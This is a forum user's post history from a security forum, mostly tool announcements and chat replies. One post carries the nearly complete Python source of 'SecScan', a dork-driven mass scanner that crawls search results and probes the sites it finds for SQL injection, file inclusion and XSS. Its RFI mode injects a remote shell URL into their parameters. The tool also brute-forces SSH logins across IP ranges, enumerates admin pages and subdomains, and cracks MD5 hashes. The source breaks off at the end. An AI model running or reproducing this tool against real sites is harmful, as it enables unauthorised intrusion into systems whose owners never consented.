Fi8sVrs

Active Members
  • Posts: 3206
  • Days Won: 87

Everything posted by Fi8sVrs

  1. So this means you came here just to advertise yourself?!
  2. There are sections, if you want to stay among us: https://rstcenter.com/forum/web-design-stuff.rst https://rstcenter.com/forum/bloguri-si-bloggeri.rst
  3. Our good friends at Google run a daily puzzle challenge and asked us to help get them out to the geeky masses. Each day’s puzzle will task your googling skills a little more, leading you to Google mastery. Each morning at 12:01 a.m. Eastern time you’ll see a new puzzle posted here. SPOILER WARNING: We leave the comments on so people can work together to find the answer. As such, if you want to figure it out all by yourself, DON’T READ THE COMMENTS! Also, with the knowledge that because others may publish their answers before you do, if you want to be able to search for information without accidentally seeing the answer somewhere, you can use the Google-a-Day site’s search tool, which will automatically filter out published answers, to give you a spoiler-free experience. And now, without further ado, we give you… TODAY’S PUZZLE: Start Playing Note: For our long-term puzzlers, Google has changed their puzzle delivery, and now we can use this handy-dandy widget. We hope you enjoy! Source
  4. Across the Northern Hemisphere, students and their teachers are heading back into the classroom for another year of reading, writing, and ‘rithmetic. While what we learn has broadly stayed the same for years, how we learn is changing rapidly as technology advances. The rise of online educational videos is giving learners access to the world’s greatest thinkers and teachers, leveling the playing field for all. We believe that inspiring online educators can come from all walks of life, and we want to find the next generation of educational YouTube stars - people with a talent for explaining tough concepts in compelling ways, and the passion and drive to assemble a global classroom of students. YouTube educational channels like Khan Academy, CrashCourse, Veritasium, Numberphile, MinutePhysics and Ted-Ed have grown to millions of views and subscribers - could you be next? Today we’re teaming up with Khan Academy to start a search for the Next EDU Gurus--10 super talented and engaging content creators who we’ll support with training, promotion, and a $1000 B&H gift card for production equipment, so they can take the next step in their YouTube - and education - careers. Do you set historical events to music? Doodle your geometry? Sing your Shakespeare? We’re looking for content creators who create all kinds of curriculum-related videos, from grammar to geography, history to histograms. You can submit any style of video as long as it’s educational and family-friendly--just bear in mind that we’re looking for content creators who can take people on a journey through a topic, so if you could imagine making ten, twenty, or fifty more videos on the topic in the future, all the better! The 10 YouTube Next EDU Gurus will be selected by a panel from the YouTube Education team and the Khan Academy. One of these 10 will also be awarded the Khan Academy EDU Guru Prize. 
The program is open to creators in the US, Canada, UK, Ireland, Australia, New Zealand; it opens today and closes on October 1. Our new EDU Gurus will help meet the growing demand for great educational content on YouTube. In the last year, you all spent 50% more time learning from YouTube Education’s 700,000 videos, and the number of subscribers to YouTube’s educational channels more than doubled. Check out the YouTube.com homepage today for the latest videos from some of our most engaging educational creators. You can also see a playlist of their latest and greatest below. If you’re an educator, visit youtube.com/teachers to view more than 300 playlists curated by teachers to align with common education topics. And if you’re looking for inspiration about incorporating YouTube in your school curriculum, see how one school from Kent, WA uses YouTube to experience the world beyond the walls of their classroom. via YouTube Blog: Finding the next generation of talented video educators with YouTube Next EDU Guru
  5. If you lend it to me, I'll get myself an iPhone from the gypsies. Edit: and I'll get you one too.
  6. Fi8sVrs

    Location

    I see that Gecko has https://rstcenter.com/forum/58898-6-free-pushed-text-effects.rst#post388519. ONREPLY=ALERT
  7. The LogAnalyzer project provides an easy to use but powerful front end for searching, reviewing and analyzing network event data, including syslog, windows event log and many other event sources. It focusses on the user-interface side of this project, so the data itself needs to be gathered by another program, for example the stock rsyslog, syslogd (often the distro's default syslogd), WinSyslog or MonitorWare Agent. LogAnalyzer works equally well on Linux and Windows. It is a free, GPLed open source application written mostly in php. Data can be obtained from databases but also from plain text files, for example those that are written by the syslogd. Demo Downloads Source
  8. Description: PAC is a Perl/GTK replacement for SecureCRT/Putty/etc (Linux ssh/telnet/... GUI). It provides a GUI to configure connections: users, passwords, EXPECT regular expressions, macros, etc. You like 'SecureCRT/SSHMenu'? Check this tool and let me know.
    Released PAC 4.3:
      • Awesome PAC startup speed improvement, especially when *too many* connections are configured!
      • Added options to allow/deny both visible/audible terminal bell
      • Added DnD method for the "Local Shell" tab to untab
      • Added <Ctrl><Alt>d shortcut to duplicate current connection
      • Added <Shift><Ctrl><Alt>d shortcut to *FULL* duplicate current connection
      • Fixed a bug that prevented PAC from working properly with "local executions on disconnection"
      • Fixed a bug that prevented PAC from correctly working if both "rdesktop" and "xfreerdp" packages were installed
      • Modified the "Save" connection method to not allow saving if any error is encountered
      • Fixed erroneous check for "cu" connections on save
    Unique Linux application to implement almost every SecureCRT's functionality.
      • Remote and local macros.
      • Remotely send commands with EXPECT regexp.
      • Cluster connections!! Connections on same cluster share keystrokes!!
      • Proxy support.
      • Serial/tty connection via cu/tip/remote-tty connections!!
      • RDP (via rdesktop) and VNC (via vncviewer) support!!
      • Pre/post connections local executions.
      • Line-send delay capabilities.
      • TABS OR WINDOWS for connections!!
      • Quick access to configured connections via tray menu icon.
      • Wake-On-LAN features!
      • Many many more I just forgot, and many many more to come (ASA I find time!)
      • FREE (GNU GPLv3)
    Please visit the next pages for information/downloads:
      - Debian/Ubuntu based repository courtesy of Getdeb.net: Add "deb http://archive.getdeb.net/ubuntu lucid-getdeb apps" to your /etc/sources.list file, then "update" and finally install "pac".
      - Download: https://sourceforge.net/projects/pacmanager/
    source: https://sites.google.com/site/davidtv/
  9. ISME is a small framework to test IP phones from several editors. It can gather information from IP phone infrastructures, test their web servers for default login/password combinations, and also implement attacks against the systems. ISME has been written in perl with a perl/Tk interface to provide a portable and easy to use tool. Full documentation is also provided. Download source
  10. This is a Security focused plug-in, which will send an email to the Administrator of the WordPress site each time login page is reached. If someone attempts to login, it will also send the user name they tried logging in with, as well as their IP address, User-Agent, Timestamp, and the Referral URL. If you see multiple attempts to login at times you are not logged on to the site, this means someone is attempting to brute force their way into your site, and you should ban the offending IP address from your site. Especially if they are trying multiple names, or sending them rapidly, one after another. Download Version 2012-08-13.5 Source: attack-scanner.com
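Added example (not part of the original post or of the plugin): one way to triage the data these alert e-mails carry, flagging source IPs that try several usernames or send attempts in rapid succession, the two signs the description names. The records, thresholds and function names are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: (timestamp, source IP, attempted username), i.e. fields
# the alert e-mails carry. IPs are from the RFC 5737 documentation ranges.
ATTEMPTS = [
    ("2012-08-14 03:10:01", "203.0.113.7", "admin"),
    ("2012-08-14 03:10:02", "203.0.113.7", "administrator"),
    ("2012-08-14 03:10:03", "203.0.113.7", "root"),
    ("2012-08-14 03:10:04", "203.0.113.7", "test"),
    ("2012-08-14 09:00:00", "198.51.100.20", "alice"),
    ("2012-08-14 09:00:40", "198.51.100.20", "alice"),
    ("2012-08-14 11:00:00", "192.0.2.55", "bob"),
    ("2012-08-14 11:00:05", "192.0.2.55", "bob"),
    ("2012-08-14 11:00:10", "192.0.2.55", "bob"),
    ("2012-08-14 11:00:15", "192.0.2.55", "bob"),
    ("2012-08-14 11:00:20", "192.0.2.55", "bob"),
]


def parse_ts(text):
    """Parse the timestamp format used in the constructed sample."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def flag_sources(attempts, window=timedelta(seconds=60),
                 max_in_window=5, max_usernames=3):
    """Return {ip: [reasons]} for sources that look like brute forcing.

    "many-usernames": the IP tried at least max_usernames distinct names.
    "rapid": at least max_in_window attempts fell inside one sliding window.
    """
    by_ip = defaultdict(list)
    for ts, ip, user in attempts:
        by_ip[ip].append((parse_ts(ts), user))

    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        reasons = []
        if len({user for _, user in events}) >= max_usernames:
            reasons.append("many-usernames")
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans <= `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= max_in_window:
                reasons.append("rapid")
                break
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in sorted(flag_sources(ATTEMPTS).items()):
        print(ip, ", ".join(reasons))
```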
  11. This plugin drastically increases the security of the hash used to store passwords. This plugin seamlessly changes your stored password hash to a far stronger one. The hash that it is changed to is generated with a variety of variations on PBKDF2, including my own ARC4PBKDF2 which adds custom ARC4 encryption during the hashing process, then a SHA-1 to meet size constraints. This plugin exponentially increases the strength of your stored password. Download source: attack-scanner.com
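Added example (not the plugin's code): how a stored hash can be upgraded transparently at login, shown in Python with standard PBKDF2-HMAC-SHA256 from `hashlib` rather than the ARC4PBKDF2 variant the post mentions. The legacy format (unsalted MD5 hex), the storage-format tag, the iteration count and all function names are assumptions made for the illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000        # assumed work factor for this example
PREFIX = "pbkdf2-sha256"    # hypothetical tag identifying the new format


def legacy_md5(password):
    """Assumed legacy scheme: unsalted MD5, hex encoded."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_hash(password, iterations=ITERATIONS, salt=None):
    """Return 'tag$iterations$salt_hex$derived_hex' with a random 16-byte salt."""
    salt = os.urandom(16) if salt is None else salt
    derived = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, iterations)
    return "%s$%d$%s$%s" % (PREFIX, iterations, salt.hex(), derived.hex())


def check_login(password, stored):
    """Verify a password and decide whether the record must be rewritten.

    Returns (ok, replacement). `replacement` is a new PBKDF2 record when the
    login succeeded against a legacy or under-strength hash, else None.
    The upgrade can only happen at login, because that is the one moment
    the plaintext password is available.
    """
    if stored.startswith(PREFIX + "$"):
        _, iterations, salt_hex, derived_hex = stored.split("$")
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode("utf-8"),
            bytes.fromhex(salt_hex), int(iterations))
        ok = hmac.compare_digest(candidate, bytes.fromhex(derived_hex))
        needs_upgrade = ok and int(iterations) < ITERATIONS
    else:
        # Constant-time comparison even for the legacy check.
        ok = hmac.compare_digest(legacy_md5(password), stored)
        needs_upgrade = ok
    return ok, (pbkdf2_hash(password) if needs_upgrade else None)


if __name__ == "__main__":
    record = legacy_md5("correct horse")           # constructed legacy record
    ok, replacement = check_login("correct horse", record)
    print("login ok:", ok)
    print("rewritten record:", replacement)
```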
  12. WordPress Attack Scanner will log various types of attacks against your WordPress based site. In this free version, we only log the last 100 attacks, and then delete the oldest entry. In the fully paid for version, we have a built-in firewall, so anything that you see on the attack logs, would also be blocked. The full version also has unlimited logging, as well as the ability to export to a CSV file for use in spreadsheets, charts, or for plotting attacks on something such as Google Maps using the Google Maps API. In both the free and paid for version, we encrypt all logs. No CSV files exist on the site, and are generated on the fly, and never stored on the site, so no one can download and see your attack logs. However, you should change the default password as soon as you install and activate the plug-in! download source: packetstormsecurity.org
  13. That's how I entered it; I put http in the code block so that it wouldn't be confused with the asterisks. It probably has filters on certain IP classes.
  14. demo http://www.facebook.com/pages/Indian-Name/340599102686666?sk=app_152630231540719 download http://www.filehost.ro/28858626/facebook_app_7z/ PHP Scripts - Facebook Campaign - Find Your Indian Name | CodeCanyon
  15. C:\>ping http://***********.com/forum/index.php Ping request could not find host http://***********.com/forum/index.php. Please check the name and try again.
  16. SecScan is the Multithreading Web Vulnerability Scanner plus professional Utilities for penetrating testers. A compact Web Apps Vulnerable Scanner for amateur pentester.
    Feature - SQLi, XSS, LFI, RFI
    Utilities - Admin/login finder, sub-domain finder, online/offline MD5 cracker, Router checker, local IP lookup
    Stable version will cover - auto SQL injector (bind with SlowQL), Fuzzer, Port/OS Scanner, MD5/SHA1 bruteforcer, MD5/SHA1 crypter
    Known bugs - Still crashes during MD5 dictionary attack on large lengths of text. XSS sometimes gives false positives.
    How to run - To run: ./SecScan
    Bug issues report at: norske.drittsekk@gmail.com || digiopen55@gmail.com
    Fix issues & upgrades:
      - Crash during LFI & XSS scans
      - More MD5 Dictionary cracking features & functions.
      - Run more stable in SQL scan mode.
      - Able to search more than 20 pages. (max is 90 to avoid cut off/CAPTCHA-request by search engine)
      - more search engine choice. Default is still Ask Engine. (Bing & Yahoo are fine, not recommend Google API)
      - More stealthy
      - Random user-agent generator
    Will add more in near-future:
      - SQL injector (bind with my other project slowQL)
      - MD5 bruteforcer (offline)
      - SHA1 Dic/Brute cracker
      - Hex viewer.
      - Proxy finder
      - Proxified mode
      - Heuristic port & OS scanner (similar to N-map)
    #!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko #Router option requires the paramiko module for shh connections. PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 
tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nScanning Ask...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for 
Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("You have an error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "MySql: " + url write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print 'Dupe: ' + url else: print "MsSql: " + url write = open ('[SQLI]: ' + self.file, "a+") write.write(url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: 
self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Lfi: " + url write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """"><script>alert('xss')</script>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("<script>alert('xss')</script>", data, re.I)): self.xss(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Xss: " + url write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = 
self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): #Or change to whatever is going to be in your shell for sure. self.rfi(link) vuln += 1 else: print link + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Rfi: " + url write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' 
,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 
'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print 'Found: ' + site class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", 
"demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' 
+ site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): 
"""Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + ' Vulnerable Sites Found' print '>> ' + str(invuln) + ' Sites Not Vulnerable' print '>> ' + str(np) + ' Sites Without Parameters' if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' def main(): """Outputs Menu and gets input""" red = "\033[01;31m{0}\033[00m" quotes = [ '\n{Happy Hacking, friends & foes} -- NorskeDrittsekk\n' '\n{What is the different between an exploiter & cryptographer? An exploiter has a lot creativity} -- f0ny\n' ] print red.format(''' ++++++++++++++++++++++++++++++++++ + = Advance Web Apps Scanner = + + + + by + + + + Black Tiger Security + + + + now available + + + + in public + ++++++++++++++++++++++++++++++++++ Please choose one of these options below (enter numbers only): === Scanners: [[READ: you don't have to enter inurl, just stuff like index.php?id= or .aspx?id=]] [1] SQLi [2] LFI [3] XSS [4] RFI === Other Tools: [5] Route Checker [6] Admin Page Finder [7] Sub Domain Scan [8] Dic MD5 cracker [9] Online/Rainbow MD5 cracker [10] Check local IP address ''') global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print red.format(choice(quotes)) elif option == '2': Crawl() output() print red.format(choice(quotes)) elif option == '3': Crawl() output() print red.format(choice(quotes)) elif option == '4': Crawl() output() print red.format(choice(quotes)) elif option == '5': Ip() print 